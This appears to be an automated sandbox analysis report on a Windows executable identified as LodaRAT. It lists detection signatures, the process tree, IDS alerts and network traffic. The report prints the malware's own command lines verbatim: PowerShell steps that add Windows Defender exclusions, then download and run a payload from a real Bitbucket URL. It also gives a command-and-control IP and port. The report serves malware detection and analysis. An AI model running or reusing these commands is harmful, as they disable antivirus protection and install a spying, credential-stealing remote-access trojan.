Windows Analysis Report
Gq48hjKhZf.exe

Overview

General Information

Sample name: Gq48hjKhZf.exe (renamed because the original name is a hash value)
Original sample name: 454bf064c19d363b154a419fc69dc693.exe
Analysis ID: 1580296
MD5: 454bf064c19d363b154a419fc69dc693
SHA1: 98beb972b52d32c846e9e485cbf17e9211cbe5ab
SHA256: 6a46b3762d71b47d0c728e967ee9129f523689ff70196a953baa3f60c85a26b5
Tags: exe, user-abuse_ch

Detection

LodaRAT
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Gq48hjKhZf.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\Gq48hjKhZf.exe" MD5: 454BF064C19D363B154A419FC69DC693)
    • cmd.exe (PID: 3148 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2828 cmdline: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6340 cmdline: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')"; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1784 cmdline: powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3716 cmdline: cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • AHPOBS.exe (PID: 6756 cmdline: C:\Users\user\AppData\Local\Temp\AHPOBS.exe ; MD5: A9C526F3A276012D554AC382A90BCA3D)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Gq48hjKhZf.exe PID: 6396 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: AHPOBS.exe PID: 6756 | JoeSecurity_LodaRAT | Yara detected LodaRAT | Joe Security |
Process Memory Space: AHPOBS.exe PID: 6756 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_6340.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 2828, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 2828, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 6340, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 6340, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 2828, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 6340, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 2828, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T09:03:09.265641+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49808 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:04:59.614750+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49983 | 172.232.216.250 | 4000 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T09:02:05.166648+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49982 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:02:05.166648+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49961 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:02:05.166648+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49983 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:02:05.166648+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49859 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:02:05.166648+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49808 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:02:05.166648+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49910 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:03:09.265641+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49808 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:03:31.346839+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49859 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:03:53.435333+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49910 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:04:15.523618+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49961 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:04:37.566783+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49982 | 172.232.216.250 | 4000 | TCP
2024-12-24T09:04:59.614750+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49983 | 172.232.216.250 | 4000 | TCP


AV Detection

Source: C:\Users\user\AppData\Roaming\Windata\svhost.exe, Avira: detection malicious, Label: HEUR/AGEN.1321335
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Avira: detection malicious, Label: HEUR/AGEN.1321335
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Virustotal: Detection: 70%
Source: C:\Users\user\AppData\Roaming\Windata\svhost.exe, ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\Windata\svhost.exe, Virustotal: Detection: 70%
Source: Gq48hjKhZf.exe, Virustotal: Detection: 56%
Source: Gq48hjKhZf.exe, ReversingLabs: Detection: 39%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Roaming\Windata\svhost.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Joe Sandbox ML: detected
Source: Gq48hjKhZf.exe, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 3.5.8.193:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,10_2_004339B6
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00452492
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00442886
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_004788BD
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,10_2_0045CAFA
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00431A86
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_0044BD27
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0045DE8F FindFirstFileW,FindClose,10_2_0045DE8F
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0044BF8B
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe, File opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.tmp
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe, File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe, File opened: C:\Users\user\
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe, File opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe, File opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp

Networking

Source: Network traffic, Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.5:49808 -> 172.232.216.250:4000
Source: Network traffic, Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49808 -> 172.232.216.250:4000
Source: Network traffic, Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49859 -> 172.232.216.250:4000
Source: Network traffic, Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.5:49983 -> 172.232.216.250:4000
Source: Network traffic, Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49983 -> 172.232.216.250:4000
Source: Network traffic, Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49982 -> 172.232.216.250:4000
Source: Network traffic, Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49910 -> 172.232.216.250:4000
Source: Network traffic, Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49961 -> 172.232.216.250:4000
Source: global traffic, HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZLOXG2B&Signature=SWcM%2FOPeR%2BxliX6J91lSOPwmbQQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCICYvR56NrQqFga3kiY1aQut3DfJ%2F3mouCTxMKwxxvlu9AiEAzRhWhoYfwpU93W5Kbmk%2F0oFd8SYZ7SecTeJWwbrr4q8qsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNT8poD5wcY6mW%2FA9CqEAsyA5lBS36qs0C9g9fabbm0%2BVPJMoKBXvx06v5%2Bhz4MgRV76W4zkdth%2BCfqilJsCo1BEjkNvg0i27Nz7jMqfQuuIPabkIIZ8Jx0JPukqPqdaH2Br%2FJfu%2BbniBu%2FF%2BMDbd6sGF6faz5wxQbZrU9mN6UV2zn6lvu%2BVHhzGTsDSS%2BMrycK8iTHC2yvERkyiZy7JbG%2BP2dGK3Q%2FftHqyyhaseC0Ew4%2FSdXJlfsKXP7vCUL86eSou6pISsSLwuDc%2Byrgz0Stvci9kY%2F7ciYEzd1oCJ0cmOCOC5nDZvo%2FjmidwltfgIvSSK44XdxhPAAdlx4hmiuIgWsQl9%2Biqj8YhkLMQy22TRNHaMKTUqbsGOp0BTHIfIOC4Yhi8ptO9erjj5vxgbcnFwUWN2iNmempfYjp0od53cyJ%2Fs4GEYpDAK6GmYToRGlTJNyLpnp5mWyllHFhlS4MgWZ%2FiOhFUhQFfPxKT6JeUDOj0QsfykBEnb3FQyIvkEHL38u8vQu5i2OzM7YRDr5j3DJKcINym92AHCx2gN6Byj%2F2vvZcmQSR7GQK3BQkqucQ7RpgTHC7wCA%3D%3D&Expires=1735029036 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 185.166.143.49
Source: Joe Sandbox View, ASN Name: AKAMAI-ASN1EU
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, TCP traffic detected without corresponding DNS query: 172.232.216.250 (28 occurrences)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_004422FE InternetQueryDataAvailable,InternetReadFile,10_2_004422FE
Source: global traffic, HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZLOXG2B&Signature=SWcM%2FOPeR%2BxliX6J91lSOPwmbQQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCICYvR56NrQqFga3kiY1aQut3DfJ%2F3mouCTxMKwxxvlu9AiEAzRhWhoYfwpU93W5Kbmk%2F0oFd8SYZ7SecTeJWwbrr4q8qsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNT8poD5wcY6mW%2FA9CqEAsyA5lBS36qs0C9g9fabbm0%2BVPJMoKBXvx06v5%2Bhz4MgRV76W4zkdth%2BCfqilJsCo1BEjkNvg0i27Nz7jMqfQuuIPabkIIZ8Jx0JPukqPqdaH2Br%2FJfu%2BbniBu%2FF%2BMDbd6sGF6faz5wxQbZrU9mN6UV2zn6lvu%2BVHhzGTsDSS%2BMrycK8iTHC2yvERkyiZy7JbG%2BP2dGK3Q%2FftHqyyhaseC0Ew4%2FSdXJlfsKXP7vCUL86eSou6pISsSLwuDc%2Byrgz0Stvci9kY%2F7ciYEzd1oCJ0cmOCOC5nDZvo%2FjmidwltfgIvSSK44XdxhPAAdlx4hmiuIgWsQl9%2Biqj8YhkLMQy22TRNHaMKTUqbsGOp0BTHIfIOC4Yhi8ptO9erjj5vxgbcnFwUWN2iNmempfYjp0od53cyJ%2Fs4GEYpDAK6GmYToRGlTJNyLpnp5mWyllHFhlS4MgWZ%2FiOhFUhQFfPxKT6JeUDOj0QsfykBEnb3FQyIvkEHL38u8vQu5i2OzM7YRDr5j3DJKcINym92AHCx2gN6Byj%2F2vvZcmQSR7GQK3BQkqucQ7RpgTHC7wCA%3D%3D&Expires=1735029036 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
Source: global traffic, DNS traffic detected: DNS query: bitbucket.org
Source: global traffic, DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: AHPOBS.exe, 0000000A.00000002.3917281213.0000000003E85000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://checkip.amazonaws.com/
Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ip-score.com/checkip/
Source: AHPOBS.exe, 0000000A.00000002.3917281213.0000000003E85000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/files/beta/autoit/archive/sqlite/SQLite3O:Te
Source: Gq48hjKhZf.exe, 00000000.00000002.3916726435.00000000020C6000.00000004.00000020.00020000.00000000.sdmp, AC31.bat.0.dr, String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe
Source: unknown, Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown, HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 3.5.8.193:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_0045A10F
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_0045A10F
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,10_2_0046DC80
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,10_2_0044C37A
